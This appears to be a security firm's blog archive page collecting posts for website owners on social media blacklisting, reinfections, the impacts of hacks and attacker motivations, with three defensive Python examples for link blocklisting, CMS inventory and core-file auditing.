Website Security: How Do Websites Get Hacked?


In 2014 the total number of websites on the internet reached 1 billion; today it is hovering somewhere in the neighborhood of 944 million due to websites going inactive, and it is expected to normalize again at 1 billion sometime in 2015. Let’s take a moment to absorb that number. Another surprising statistic is that Google, one of the most popular search engines in the world, quarantines approximately 10,000 websites a day via its Safe Browsing technology. From our own research, of the millions of websites that push through our scanning technology, we often see 2 – 5% of them have some Indicator of Compromise (IoC) that signifies a hack. Granted, this might be a bit high, as the websites being scanned are often already suspected of having an issue, so to be conservative we would extrapolate that to suggest about 1% of the total websites online are hacked or infected. To put that into perspective, we are talking somewhere in the neighborhood of 9 million websites that are currently hacked or infected.

With this sort of impact, it’s only natural that people are curious how websites keep getting hacked. The challenge, however, is that the answer has been the same for quite some time.

How Social Media Blacklisting Happens

(Image: Social media blacklists)

In today’s world, we are all browsing websites online and sharing content on a multitude of social media platforms every day. Worldwide social media users exceeded 2 billion back in August 2014, with an adoption rate unlike anything we have seen in history. Social media continues to grow around the world, with active user accounts now equating to roughly 29% of the world’s population. Monthly active user (MAU) figures for the most active social network in each country add up to almost 2.08 billion – a 12% increase since January 2014.

What is Social Media Blacklisting?

Legitimate links on social media platforms are sometimes hijacked by criminals to direct visitors to a website where malware will be automatically downloaded. The more that people share and use social media, the more often these situations will occur. This is why social media platforms have specific security measures to protect their users from being victims of malicious shared content.

In the same way that websites can be blacklisted by Google for having malware hosted on their pages, social media blacklisting occurs when security triggers detect malicious activity, thus placing the infected links on their internal blacklist. Sometimes they can match the URL with the help of an external blacklist authority, such as McAfee, Google, Web of Trust, or Websense.

Other Types of Blacklists

The initial reaction to hearing the term “blacklist” is to think that whoever is on the list is restricted from visiting a certain area or performing certain activities. In the case of websites and social media links, this means that the content is labeled as dangerous to visitors. This could be due to spam or malware being served from its pages. Our team deals with this kind of thing every day, providing blacklist removal for website owners along with complete malware cleanup and protection.

You may have encountered the term “blacklisting” in conjunction with email marketing. As a mass-email sender, your reputation and content choices can get your IP blacklisted by major email service providers. If they believe you are sending spam, or violating CAN-SPAM and similar legislation, it can be very difficult to recover from being blacklisted for email abuse.

Social media blacklisting is still a recent phenomenon. As criminals find new ways to use social media, we’ll see an evolution in the protection measures taken against them.

Facebook

In 2008, Facebook launched a security system called “the link shim” that checks the destination URL whenever a link is clicked. If the destination is on a blacklist, a warning pops up notifying the user that they could be headed to a malicious website:

(Screenshot: Facebook spam warning)

Since the link shim checks URLs at click time as opposed to display time, Facebook can prevent users from accessing malicious content. In addition to its internal and external blacklists, Facebook uses advanced machine learning classifiers to check the authenticity of the sender as well as other inputs. Malicious URLs that have been sent over e-mail are also blocked since all links to non-facebook.com URLs in e-mail are rewritten to first go through the link shim.
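The two halves of the mechanism described above (rewriting outbound links through a redirector when a message is written, and consulting the blacklist only when the link is clicked) can be sketched in a few dozen lines. The following is an added example written for this page, not Facebook’s code; the blocklist entries, the `l.example` redirector endpoint and the `u=` parameter are all constructed for illustration. It also shows the matching caveat a defender cares about: the blocklist is matched on the parsed hostname and its subdomains, so `facebook.com.malware.example` and `facebook.com@malware.example` are neither trusted nor missed.

```python
import re
from urllib.parse import urlsplit, urlunsplit, quote, parse_qs

# Constructed sample blocklist: hypothetical hostnames, not real indicators.
BLOCKLIST = {"malware.example", "phish.example.net"}

# Hostname suffix whose links are delivered unchanged (the platform's own site).
TRUSTED_SUFFIX = "facebook.com"

# Hypothetical redirector endpoint standing in for the real link shim URL.
SHIM_BASE = "https://l.example/l.php"


def normalize(url):
    """Canonicalize a URL so lookups are not fooled by case, userinfo or a trailing dot."""
    parts = urlsplit(url.strip())
    if not parts.hostname:
        return url.strip()          # nothing to normalize; caller decides what to do
    host = parts.hostname.lower().rstrip(".")
    scheme = parts.scheme.lower() or "http"
    return urlunsplit((scheme, host, parts.path or "/", parts.query, ""))


def host_matches(host, listed):
    """True for the listed host itself and its subdomains, never for look-alike prefixes."""
    return host == listed or host.endswith("." + listed)


def is_blocked(url):
    host = urlsplit(normalize(url)).hostname or ""
    return any(host_matches(host, h) for h in BLOCKLIST)


def shim_link(url):
    """Rewrite an outbound link at write/display time to go through the redirector.
    The destination rides along as a query parameter; no blocklist decision is made here."""
    host = (urlsplit(url).hostname or "").lower()
    if host_matches(host, TRUSTED_SUFFIX):
        return url
    return SHIM_BASE + "?u=" + quote(normalize(url), safe="")


HREF_RE = re.compile(r'href="([^"]+)"')


def rewrite_links(html):
    """Rewrite every href in an outgoing message body through the shim."""
    return HREF_RE.sub(lambda m: 'href="%s"' % shim_link(m.group(1)), html)


def click_decision(shim_url):
    """Handle a click on a shimmed link: consult the blocklist *now*, not when the
    link was written. Returns (decision, target) where decision is 'allow',
    'warn' (show an interstitial) or 'deny' (malformed or non-web target)."""
    target = parse_qs(urlsplit(shim_url).query).get("u", [""])[0]
    if not target or urlsplit(target).scheme.lower() not in ("http", "https"):
        return ("deny", "")
    target = normalize(target)
    if is_blocked(target):
        return ("warn", target)
    return ("allow", target)


if __name__ == "__main__":
    link = shim_link("https://newbad.example/")
    print("before listing:", click_decision(link))
    BLOCKLIST.add("newbad.example")
    print("after listing: ", click_decision(link))   # same link, now warns
```

The last four lines are the whole point of click-time checking: a link shared before a host was blacklisted still produces a warning once the host is added, because the decision is deferred until someone actually clicks.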

The Facebook Security page provides constant updates. You can get the latest information about how to safely use your Facebook profile and pages, as well as a few techniques Facebook employs to protect users from being targets of malware sharing activities.

Although it is good to know that you’re protected by the social platform, offer your help by always reporting any suspicious links you may find on your timeline. This crowd-sourcing effort helps protect other users as well.

Twitter

The microblogging platform is often the target of malicious activity for a few reasons:

  • Tweets can easily be scheduled automatically by malicious or hacked user accounts.
  • With the rise of URL shortening, users are used to not seeing the full landing URL.
  • Its explosion in global popularity.

Many users are tempted with a cleverly worded message, a photo, and a link. They click it without thinking.

Back in 2009, Twitter started using Google’s list of suspected phishing and malware pages to filter URLs. Along with Twitter’s own internal security mechanisms, the Google Safe Browsing API allows client applications to check URLs against an updated Google blacklist.

Once a website is blacklisted on Google, this is reported to Twitter’s platform and users are prevented from reaching the infected websites via Twitter.

If the URL of the site you manage is being blocked, and you are completely sure that your site is not being used for abuse on Twitter, you can contact the Twitter Support team. In the Problematic link field, insert the extended URL of the link you are having issues with, rather than a shortened version. You can find extensive information on Twitter’s Security measures on unsafe links here.

LinkedIn

Malware on LinkedIn often takes the form of phishing or spam campaigns. Malicious software, or “malware”, refers to a variety of software created for the purpose of harming your computer. This harm can include disrupting your computer’s normal operations, like making it run slower, causing abrupt pop-ups, or stealing your personal information. Viruses are a particular form of malware that aim to spread from computer to computer with the intention of exploiting your computer’s data or deleting it.

LinkedIn is taking specific steps in protecting their users, as well as teaching them important aspects of online security. Here’s what they say:

  • We scan uploaded files for malware and viruses. If we identify an infected file or image, we will prevent the download from occurring and keep it from infecting your computer.
  • We include your full first and last name in the footer of all our messages, as well as your current professional headline so you can better identify legitimate LinkedIn communications. Any messages claiming to be from LinkedIn without our security footer should be discarded.
  • We will never ask you to download software from any of our messages, nor will we ask you to provide sensitive information such as a password or social security number via email.

Is Social Media Safe?

Any online membership website has its fair share of security risks and there’s always a potential of being infected with malware while browsing both websites and social media venues. We cannot say that any social platform is safer than a website or vice-versa.

But we can never stress enough the importance of having an informed and educated security posture online! Being informed means protecting yourself before an attacker gets the chance to start their attack.

Some Takeaways

  • Make sure you are aware of the risks before connecting to any major social media venue and creating a post. Each platform has security measures in place, and information for you to stay up-to-date with privacy and security issues. Read those pages, they are put together with the help of dedicated security analysts, using thousands of man hours, just to protect you.
  • Social media blacklisting is not something to be afraid of if you’re security conscious. That list is not meant to harm you or your business; it is there to protect you, so make sure you report any suspicious links or content using the specified methods for each social venue. Giving a helping hand is also helping yourself.
  • Want to check a suspicious bit.ly shortened link? Before you share it further, copy and paste the bit.ly link into your browser address bar, add a “+” after it and hit enter. The real target URL will reveal itself together with additional information about the link: when it was generated, who shared it, and where it was shared. So in the example of http://bit.ly/1PlZm6L, we would add “+”, thus creating http://bit.ly/1PlZm6L+. The real target URL in this case is https://blog.sucuri.net/2015/04/how-to-create-a-website-backup-strategy.html
  • Social media platforms leverage security experts that know a lot about security, and work with partners to expand their knowledge. If there is a warning that some content may be malicious, you should take the warning seriously.

Have you experienced any social media blacklisting on your website? Please do leave a comment detailing your experience. Let others learn from what you went through, in an effort to educate future users into being more careful and trust the systems put in place to protect them. Then go out there and share safely!

How To Create a Website Backup Strategy


We’ve all heard it a million times before – backups are important. Still, the reality is that even today, backups remain one of the most overlooked and under-utilized precautions we can take to protect our vital data.

Why are backups so important

Put simply, a good set of backups can save your website when absolutely everything else has gone wrong. If a malicious attacker decides they want to wipe all your site files, or if your web server has a catastrophic hard drive failure, all the damage can be easily undone by restoring from your backups. The idea is simple: to make sure your data is safe, you make a copy of it. If something happens to the original you can always use your backup copy.

Simple, right? Unfortunately it isn’t that simple at all, and there are a number of factors that determine whether your backups will be useful, practical and secure.

Why Website Reinfections Happen


I joined Sucuri a little over a month ago. My job is actually Social Media Specialist, but we have a process where, regardless of your job, you have to learn what website infections look like and, more importantly, how to clean them. It’s the idea that no matter who you are, you must know the foundation that makes this company work. After a month of this training, I made some very interesting observations through my interactions with some of our clients and felt some of you might find them interesting. This might be new to some and not so new to others, but for me it was fascinating and worth a share.

I will note that a month ago I was like many of you: I operated my own website, and still do, and came to know of Sucuri because my own website had been hacked. Such is the circle of life that I now work at this fascinating place. Here are some of my observations from my last month here; I hope they help someone.

1. Passwords

It is important to understand that whenever you create a website, even before you actually register your domain name, one thing should be at the top of your list: create a good password. Our friends at WPEngine put together a fascinating post unmasking the psychology behind passwords; if you have time, give it a once over. On that note, always use correctly generated passwords. Where?

Short answer: Everywhere passwords are required.

Longer explanation:

  • On your registrar account. We see many examples of domains being DNS-spoofed because the domain registrar account was hacked (see the recent Lenovo.com case).
  • On your website hosting account. There have been multiple instances where existing customers returning for another cleanup, on the same website, were still using the old credentials they had when they initially asked us to help them. Despite the fact that we always tell customers to change their passwords after a cleanup, many don’t follow our recommendations.
  • On your computer. Make sure you always set up your computer to require a username and password to log on, never leave it unlocked when you step away from it, and make sure you’re employing best practices with your passwords. Hackers are not always trying to connect directly to your website. Instead, they will try to use possibly compromised installations of software like FileZilla or Total Commander to steal your FTP credentials and log into your website with the correct username and password, stolen from your computer.

Remember, employ complex, long and unique passwords at all times and do not use the same password across all your online profiles. Most importantly, if you’ve been infected and you get help getting it clean, update all your website passwords the minute it’s done.

2. Shared Environments

One of the biggest contributing factors to reinfections is shared environments. We’re not talking about shared versus dedicated hosting; instead we mean accounts that have multiple installations within them. Imagine a hosting account in which you install 10, 20, maybe 100 different CMS applications. These are considered soup kitchen servers, and they are ripe to be exploited.

What often happens is we forget what we’ve installed, and in the process leave the sites to their own demise. Over time, they become out of date and some, unfortunately, develop weaknesses such as known vulnerabilities. As with all things on the internet, at some point one of those weaknesses is identified by the relentless bots crawling the web. Once identified, they get exploited. Once in the environment, via a method we call leapfrogging (also known as cross-site contamination), they infect all neighboring sites, inevitably affecting your good website.

Where this plays a role is that often a website owner will clean the good website, assuming that is where the weakness is, only to find out, after much troubleshooting, that the weakness is actually in a neighboring site, leading to continuous reinfections.

Lesson?

Stop operating soup kitchen servers. If one website on the server is infected, assume they all are and get them all cleaned. If you can’t, then it might be time to do some spring cleaning.

3. Do Not Assume You Cannot Be a Target

If you’re thinking that your website is just a personal blog, school project, presentation website or small business services site, and by definition that is not a target for hackers, you are wrong. I encourage you to read our recent post on Why Websites Get Hacked, as it’ll help provide perspective.

Most attacks are not targeted attacks. You’re just one of the results of a script run against a large number of websites and servers, where the hackers are looking for vulnerabilities for their next strike. Most of the time this is done with automated tools. They can find and infect your website in minutes.

Being hosted on the server where a targeted website is also hosted will cause problems to all websites hosted there, if the server is not correctly patched and secured/hardened.

4. Complex Structures

I can think of one case where I imagined the client having gone through this thought process:

  • Let’s set up a Joomla CMS to power the main website.
  • Then, let’s create a WordPress website inside the Joomla folder, and let’s call it ./wiki/ because we found a great wiki theme for WordPress and we will use it for that.
  • Add a subdomain subdomain1.maindomain.com and use it as a backup folder for the main site.

Now, we already see three possible problems due to the different types of platforms being used. Maintaining this type of configuration takes considerable time and effort. Be sure to account for this when deploying your configuration.

It’s easy, if you’re not very technical, to lose track of which files belong where, which CMS is up-to-date and which isn’t. Not all CMS applications are treated equally.
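Both of the problems above (section 2’s forgotten installs in one hosting account and section 4’s CMS nested inside another CMS) come down to not knowing what is installed where. The following is an added example, not Sucuri’s tooling: it walks a hosting account, records every WordPress or Joomla install it finds (nested ones included), reads each WordPress version from `wp-includes/version.php`, and lists the installs that fall below a reference version the operator supplies. The sample account it builds in a temporary directory, and the `4.1.1` reference value, are constructed for the demonstration; Joomla version detection is deliberately left as “unknown” rather than guessed.

```python
import os
import re
import shutil
import tempfile

# Matches the version assignment in wp-includes/version.php, e.g. $wp_version = '4.1.1';
WP_VERSION_RE = re.compile(r"\$wp_version\s*=\s*'([^']+)'")


def wordpress_version(install_dir):
    """Read the core version of a WordPress install, or None if it cannot be read."""
    path = os.path.join(install_dir, "wp-includes", "version.php")
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            match = WP_VERSION_RE.search(fh.read())
    except OSError:
        return None
    return match.group(1) if match else None


def inventory(root):
    """Walk a hosting account and list every CMS install found, nested ones included."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        if "wp-config.php" in filenames and "wp-includes" in dirnames:
            found.append({"path": rel, "cms": "wordpress",
                          "version": wordpress_version(dirpath)})
        elif "configuration.php" in filenames and "administrator" in dirnames:
            # Joomla stores its version differently across releases; left unknown here.
            found.append({"path": rel, "cms": "joomla", "version": None})
    return sorted(found, key=lambda item: item["path"])


def version_tuple(version):
    """'4.1.1' -> (4, 1, 1) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in re.findall(r"\d+", version or ""))


def outdated(installs, reference):
    """Paths of installs below the operator-supplied reference version for their CMS,
    or whose version could not be read. A CMS absent from `reference` is skipped."""
    stale = []
    for item in installs:
        ref = reference.get(item["cms"])
        if ref is None:
            continue
        if item["version"] is None or version_tuple(item["version"]) < version_tuple(ref):
            stale.append(item["path"])
    return stale


def _write(path, content=""):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(content)


def demo():
    """Build a constructed sample account mirroring the layout described above:
    Joomla at the web root, WordPress in ./wiki/, plus a forgotten older WordPress
    blog next to it. Returns (installs, stale_paths)."""
    root = tempfile.mkdtemp(prefix="soupkitchen-")
    try:
        web = os.path.join(root, "public_html")
        _write(os.path.join(web, "configuration.php"), "<?php class JConfig {}\n")
        os.makedirs(os.path.join(web, "administrator"), exist_ok=True)
        for sub, ver in (("wiki", "4.1.1"), ("old-blog", "3.9.2")):
            _write(os.path.join(web, sub, "wp-config.php"), "<?php // db settings\n")
            _write(os.path.join(web, sub, "wp-includes", "version.php"),
                   "<?php\n$wp_version = '%s';\n" % ver)
        installs = inventory(root)
        # The reference version comes from the operator; 4.1.1 is only a sample value.
        return installs, outdated(installs, {"wordpress": "4.1.1"})
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    installs, stale = demo()
    for item in installs:
        print("%-22s %-10s %s" % (item["path"], item["cms"], item["version"] or "unknown"))
    print("below reference:", stale)
```

Run it against a real account root instead of the temporary tree by calling `inventory("/path/to/account")`; every install it lists is one more thing that needs patching, and anything in `outdated()` is exactly the kind of neighbor that seeds a reinfection.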

5. Learn the Basics of Your CMS

To avoid the mess above, start by learning the structure and names of the core files that come with the CMS of your choice. What does the original archive downloaded from the platform’s website contain? Memorize the files, their names and extensions.

Let’s look at WordPress for instance, we all love and use it, right? This is what a clean WordPress install folder looks like, when seen via my FTP client:

(Screenshot: core WordPress files viewed in an FTP program)

The wp-config.php file contains the information enabling WordPress to connect to the server and the database to store content and data. Attackers will create additional files or folders in your website with names similar to the clean WordPress files. So paying attention to them will help you determine which files could potentially have been added by the intruder. Remember, wp-config.php is not the same as wp-configs.exe or config-wp.php.
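Memorizing the core file names is the manual version of a baseline comparison. As an added example (not part of the original post, and not a Sucuri tool), the function below compares a directory listing against the top-level entries of a clean WordPress install and reports what is unexpected, what is missing, and which unexpected entries resemble a core name closely enough to be suspicious. The baseline is the real WordPress root file list; the sample listing, including the two look-alike names from the paragraph above and an `.htaccess` file, is constructed for the demonstration. The similarity threshold of 0.6 is an arbitrary starting point, not a published figure.

```python
import difflib

# Top-level entries of a clean WordPress install: the core archive's files plus the
# wp-config.php the owner creates. Restricted to the root directory for brevity.
WORDPRESS_ROOT_BASELINE = {
    "index.php", "license.txt", "readme.html", "wp-activate.php", "wp-admin",
    "wp-blog-header.php", "wp-comments-post.php", "wp-config-sample.php",
    "wp-config.php", "wp-content", "wp-cron.php", "wp-includes",
    "wp-links-opml.php", "wp-load.php", "wp-login.php", "wp-mail.php",
    "wp-settings.php", "wp-signup.php", "wp-trackback.php", "xmlrpc.php",
}

# Constructed sample listing: a clean root plus three extra entries, two of which
# mimic core file names the way the text describes.
SAMPLE_LISTING = sorted(
    WORDPRESS_ROOT_BASELINE | {"wp-configs.exe", "config-wp.php", ".htaccess"}
)


def audit_listing(entries, baseline=WORDPRESS_ROOT_BASELINE, cutoff=0.6):
    """Compare a directory listing against a known-clean baseline.

    Returns a dict with:
      unexpected - entries not in the baseline (review every one of them)
      lookalikes - unexpected entries mapped to the core name they most resemble
      missing    - baseline entries absent from the listing (tampering or a broken install)
    Comparison is case-sensitive because the web server's filesystem usually is,
    so 'WP-login.php' is an extra file, not the core login script."""
    names = set(entries)
    unexpected = sorted(names - baseline)
    lookalikes = {}
    for name in unexpected:
        close = difflib.get_close_matches(name, sorted(baseline), n=1, cutoff=cutoff)
        if close:
            lookalikes[name] = close[0]
    return {
        "unexpected": unexpected,
        "lookalikes": lookalikes,
        "missing": sorted(baseline - names),
    }


if __name__ == "__main__":
    report = audit_listing(SAMPLE_LISTING)
    for name in report["unexpected"]:
        hint = report["lookalikes"].get(name)
        print("%-16s %s" % (name, "resembles core file " + hint if hint else "not core; review"))
    print("missing core entries:", report["missing"] or "none")
```

Feeding it a real listing is a matter of `audit_listing(os.listdir(webroot))`; the same idea extends to `wp-admin/` and `wp-includes/` with a fuller baseline taken from the pristine archive, which is where attackers usually prefer to hide their extra files.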

Never feel inadequate or inferior for not knowing your way around a server or website dashboard. Always ask for professional help cleaning website hacks if you need it. Contrary to popular belief, website security is not a Do It Yourself (DIY) project.

6. Backups

Never store backups in a publicly accessible folder. Never keep backups in the same physical location as the main website. Something will always happen, and both the website and the backup folder you rely on could be deleted.

Make sure you are securely saving your website data on protected backup services, which will allow for easy data retrieval in the event of an attack. There are many services available; we have one for existing clients, but you can find a number of them on the market. The biggest mistake we see is website owners never employing a backup service. When an infection is so bad that the attacker deletes existing code, it is impossible to recover without a good backup.

You can see our full post on creating an effective website backup strategy for more information.

My Website Security Journey Continues

I hope these 6 tips help someone. They may feel foreign, but don’t worry, there is plenty of help available. Remember, there is no such thing as a 100% security solution. The difference is like getting sick and visiting the doctor. You can follow the prescribed treatment and take the pills, or say, “I don’t care about what this doctor thinks,” and continue to get sick again and again.

The same thing happens to websites. Left untreated, uncleaned, or not “medicated” correctly, a website will see the same problems reappear. So be on the safe side: learn from your mistakes, correct your security habits, keep your system updated, use correctly configured security services, and you’ll reduce your overall risk, helping you avoid becoming a recurring victim.

The Impacts of a Hacked Website

Today, with the proliferation of open-source technologies like WordPress, Joomla and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website.

We are failing each other, we are not setting ourselves up for success. We are learning the hard way what large organizations already learned – being online is a responsibility and will eventually cost you something.

I recently shared a post about the motivations behind hacks. That post was important as it helped provide context, and I encourage you to spend some time digesting the information. What it fails to do is what I want to focus on in this post.

What are the impacts of these hacks to your website? To your business?

The Effects of a Hacked Website

If you are a large organization, maybe you can quickly understand the impacts of a hack. Say you’re Facebook. What would be the value for a hacker? I’d argue a couple of things come to mind quickly: you have what is known as Personally Identifiable Information (PII), always a good thing, and you have the ability to abuse the largest network in the world and affect millions of users worldwide. There are obviously a number of other motivations, but the point is the same. The objectives are clear and Facebook knows it, and so they invest heavily in their security. The impacts of such a breach could be devastating; think loss in ad revenue, loss in user adoption, etc. This is all common sense, right? It all just makes sense, but how does that translate to the rest of the online world? The 99% of us that don’t own Facebook-like properties?

When I speak to website owners, there is often a common trend with the responses I get:

I don’t sell anything or store any information, my website is fine.

or,

It’s just a basic little site, with static content.

This is not their fault. To a certain extent, they do have a point. When you think about it rationally, why would someone bother? Fortunately, in my last post I explained why they would. In this one, though, let’s talk about 4 potential impacts of a hack: things you might be aware of, but honestly possibly haven’t given much thought to.

1. Be Mindful Of Your Audience

Maybe you write about puppies, or maybe have a website to provide your clients with assurances that you are real. Whatever the reason, something has driven you to publish something that you feel is of some interest to someone, and you’re likely right.

In doing so, you have identified a potential audience, and as your content is on the web, that audience will at some point find your website, whether you are a local gym posting your gym hours or a local restaurant showing today’s specials. The subset of people that have found their way to your website expect and demand a safe experience, even if they’ve never uttered the words.

The easiest way to digest this point is to think of yourself. Think of the websites you might spend your days visiting. Now try to fathom your feelings if while visiting a website you lost your life savings. Try to think of what you would feel like if someone stole your identity.

Should we worry about giving your visitors a safe online experience?

2. Google Does Not Discriminate

Contrary to popular belief, Google does not discriminate. Even if you do not sell, you are likely trying to achieve something. If you’re not, then what are your reasons for publishing online? Establishing a voice, sharing an opinion, or having a presence? What webmasters are almost always worried about is something known as Search Engine Optimization (SEO), more importantly how you rank on the Search Engine Result Pages (SERP).

Safe Browsing shows people more than 5 million warnings per day for all sorts of malicious sites and unwanted software, and discovers more than 50,000 malware sites and more than 90,000 phishing sites every month. – Google

What if I told you that you could lose all the hard work you put in to gain that SEO ranking in minutes? What if I told you that after a blacklist it could take you months to regain your position on these SERPs? What if I told you that a Google Blacklist has the potential to kill almost 95%, if not more, of the traffic to your website?

3. Something Known as Brand Reputation

Regardless of your business, you have a brand. Whether you realize it or not, and regardless of the size of your audience, trust is an important piece of the puzzle. Many take this for granted, but it’s critical to the success of many businesses.

It can take years to build, and minutes to lose. A hacked website is notorious for destroying trust, whether it’s a data breach or a drive-by download that infects the visitor’s desktop. The result of either action, or of one of many more nefarious acts, will almost always lead to the same thing – a loss of trust in your brand.

Are you okay with your audience losing trust in your brand?

4. Hacks Cost You More Than Money

I think it’s human nature to think, “This is not meant for me” or “I’ll just deal with it when it happens.” I can tell you though, from years of doing this work and countless engagements with website owners, the cost of a hack is always more than you can ever imagine. The response I always get is the same, “If I only knew it would be this painful.”

As a species, we are risk averse when it comes to gains, but risk seeking when it comes to loss… – Bruce Schneier

When I say cost, it’s important to note that it goes far beyond money, although that can be crippling as well.

No, instead I am talking about things you will likely never appreciate until you experience them. Things like the emotional toll of not knowing what just happened. Things like the hours you will spend arguing with hosting providers, developers and security professionals, if only they would all understand how important it is to get back online. Things like the fear that you missed something in the cleanup process, which only becomes worse if you did and suffer repeated reinfections. Things like the new fear of being online at all, of using technology as a whole. All this is exacerbated by one simple thought: “Why didn’t I take precautions?”

As surreal as these sound, these are the real costs of a hack. The money is easy to account for, as a business you take that risk; the smaller a business, the more likely you are to take the risk, the larger you are, the more foolish it is to take the risk. It’s the non-monetary impact that catches everyone off guard.

Are you emotionally and mentally prepared for a hack? Is your business?

Accounting for Website Security Is Always a Challenge

When did running a business become so challenging? Trust me, I know the feeling. Every day I ask myself the same thing. When will the expenses end? Purchase this tool, configure this feature, hire more people. It’s an endless cycle, yet a necessary one. As business owners it falls on our shoulders to make these decisions.

For me, there is nothing worse than getting caught with my pants down. This is exactly what I hear from our clients: “No one ever told me I had to think about my website’s security. No one ever told me this could impact my business.”

I hope this post helps address those points. Leverage these insights to make a better decision. If you can honestly say that none of the four items mentioned above are of any value to your business, then I encourage you to continue with the status quo. If, though, for whatever reason, they resonate, then maybe it’s a good time to start asking your technical staff more engaged questions.

A question like, “What do we do for the security of our website?”

I’ll close with a note to developers and designers. Our clients depend on us as their trusted technologists; it’s on us to educate and communicate the realities of having an online presence. Let’s do our part by introducing realistic expectations during the initial engagement process: Yes, the website will require maintenance. Yes, security is something you will be responsible for. Yes, having a website is a responsibility.

– Your Trusted Security Team,

Tony

Why Websites Get Hacked

I spend a good amount of time engaging with website owners across a broad spectrum of businesses. Interestingly enough, unless I’m talking large enterprise, there is a common question that often comes up:

Why would anyone ever hack my website?

Depending on who you are, the answer to this can vary. Nonetheless, it often revolves around a few well-defined explanations.

Automation is Key

Understand that the attacks affecting a large number of website owners in the prosumer category (a term I’m using to describe website owners in micro, small, and medium-sized businesses leveraging platforms like WordPress, Joomla and others) are predominantly automated. I wrote an article on the subject back in 2012, it’s important to revisit the subject as it’s still very relevant today.

The benefits of automated attacks have not changed; they still provide attackers the following:

  • Mass exposure
  • Reduced overhead
  • Tools for everyone, regardless of skill
  • Dramatically increased odds of success

This is not to say that these attacks are never manual, but for the vast majority, automated attacks are what we see during the initial phases of the attack sequence. When I say attack sequence, I am referring to the order of events an attacker takes to compromise an environment.

A very simple illustration of the sequence would look something like:

  1. Reconnaissance
  2. Identification
  3. Exploitation
  4. Sustainment

The attack sequence can have varying levels of complexity depending on the group of attackers. When working with everyday websites, the most effective way to affect the largest number of websites at any given time is to deploy scripts and bots during steps one and two. Steps three and four tend to involve more manual elements, although many of those can be automated as well. While thinking about how these attacks occur, it is important to note the two categories of attack: the attack of opportunity and the targeted attack.

Attack of Opportunity

Almost all prosumers fall within the realm of opportunistic attacks, meaning that no one individual is intentionally trying to hack your website; rather, it is a coincidence. Something about your site was caught by the trailing net as the attackers’ bots randomly crawl the web. It could have been something as simple as having a particular plugin installed, or displaying the version of a platform.

In our analyses, we have found that it takes about 30 – 45 days for a new website, with no content or audience, to be identified and added to a bot crawler. Once added, the attacks commence immediately without any real rhyme or reason. It can be any type of website, the only commonality is that it is connected to the web.

These crawlers then begin looking for identifying markers. Is the website running one of the popular CMS applications (i.e. WordPress, Joomla)? If so, is the website also running any exploitable software (i.e. software vulnerabilities or bugs in code)? If the answer is yes, then the site will be marked for the next phase of the attack, exploitation.

The sequence of events can happen in a matter of minutes, days or months. It is not a singular event, instead it occurs continuously, always scanning for changes or updates. It is automated, therefore, once your website is on the list it will just continue trying.

Targeted Attack

This is often reserved for the larger businesses, but not always. Think of the NBC hack in 2013, or the recent Forbes hack. There are many examples of these types of hacks lately, and it is apparent why they would be targeted. The level of effort it takes to gain entry into these environments is exponentially more difficult but the gains can be astronomical. That being said, a very common form of targeted attack can be seen in something known as a Denial of Service attack in which the attacker works to bring down the availability of your site – common between competing businesses.

With that in mind, targeted attacks are not always reserved for the big boys. They can be deployed against smaller sites, and can be driven by competition or pure boredom and the need for a challenge. These attacks can range from very simple to very complex.

Hacking Motivations and Drivers

Now that we have a better appreciation for the how, let’s turn our attention to the why. That is why you are reading this.

Economic Gains

The most obvious of the reasons is economic gain. This often manifests in attacks known as Drive-by-Downloads or Blackhat SEO campaigns. As you might imagine, these are attempts to make money from your audience.

A Drive-by-download is the act of deploying what is known as a payload (i.e. injecting your website with malware) in the hope of infecting as many of your website visitors as possible. Think of your mom or dad visiting your website and the next thing you know, they are calling you because they installed a fake piece of software that your website appeared to recommend, and this time their bank accounts were drained. Scary, but very real and very devastating.

Blackhat SEO spam campaigns are not as devastating; however, in many instances they can be more lucrative. This is the game of abusing your audience by directing them to pages that generate affiliate revenue. This is rampant in the pharmaceutical space, but has also extended to other industries like gambling, fashion and many others. What they do is inject links throughout your website; sometimes you see them, sometimes you won’t. Search engines like Google or Bing, however, see everything, and once those links make it onto the Search Engine Results Pages (SERPs) the attackers begin generating revenue from your audience.

System Resources

There is one motivator, the use of your resources, that many don’t talk about. When referring to resources, I am talking about things like bandwidth and physical server resources. I break this out as its own motivator, but it could also be grouped under economic gain. The business of farming system resources is big business and a huge motivator for many cyber groups; they are able not only to use your server as part of their own networks, but also to lease out capacity built on your stack.

You have likely heard of large botnets and I have also referenced them above. Botnets are nothing more than interconnected systems across the net; they can be desktops, notebooks and even servers – similar to your webserver. They can be employed to perform tasks simultaneously. These can include Denial of Service Attacks, Brute Force Attacks, or even some of the automated attacks mentioned above.

Attacks that target your system resources are dangerous mainly because they can proceed without you, the website owner, even realizing it. You go about your day without a worry, your website apparently in good standing and with no complaints. Then one day, out of the blue, your host shuts you down, your usage bill is through the roof, or you receive a notice from the authorities about your hacking attempts.

Hacktivism

This motivator is perhaps the hardest one to get your head around. Unlike the others, the drivers for these attacks are not primarily monetary or abusive; instead, they are about finding a way to protest around a religious or political agenda, or about showing off to peers within the hacking community.

A very common form of this is the defacement. The point of these attacks often comes down to some form of awareness. This form of attack can be combined with others, but in our experience they are often relatively benign and create more embarrassment for the site owner than harm to their users.

Pure Boredom

Something that always catches folks off guard is the idea of people attacking websites out of boredom and amusement, but it’s very true. It’s unfair to say they are always young, but a good percentage of the time they are teens bored at home.

There really isn’t much to say about this, other than, put your kids into sports!!

Good Security Begins with Good Posture

It’s easy to feel overwhelmed by some of this information, but it is our belief that the best tool you have at your disposal as a website owner is knowledge. Driving your head into the proverbial sand does not make these things disappear; it simply amplifies the impact if and when any of these attacks affect you directly. I assure you they happen more often than not, and Google’s own figures agree: it blacklists close to 10,000 sites a day for malware and flags over 20,000 sites for phishing every month.

Bruce Schneier likes to say:

As a species, we are risk averse when it comes to gains, but risk seeking when it comes to loss.

